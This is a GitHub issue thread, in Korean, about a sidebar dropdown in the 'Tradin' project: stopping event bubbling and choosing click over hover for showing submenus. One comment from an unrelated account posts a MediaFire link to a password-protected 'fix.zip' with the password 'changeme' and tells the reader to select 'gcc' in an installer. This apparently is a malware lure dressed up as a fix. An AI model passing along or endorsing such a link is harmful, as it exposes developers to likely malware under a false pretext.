### ISSUE TITLE
사이드바 메뉴 드롭다운 개선

### ISSUE THREAD

**Issue by deenuit113** [deenuit113/Tradin#21]
### UI 개선

- [x] 이벤트 버블링 방지해서 의도대로 잘 작동하는가?
- [ ] 드롭다운 아이콘에 마우스 호버 시 하위 메뉴가 보이도록 작동하는가?

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by deenuit113** [comment]
호버 대신 클릭 채택
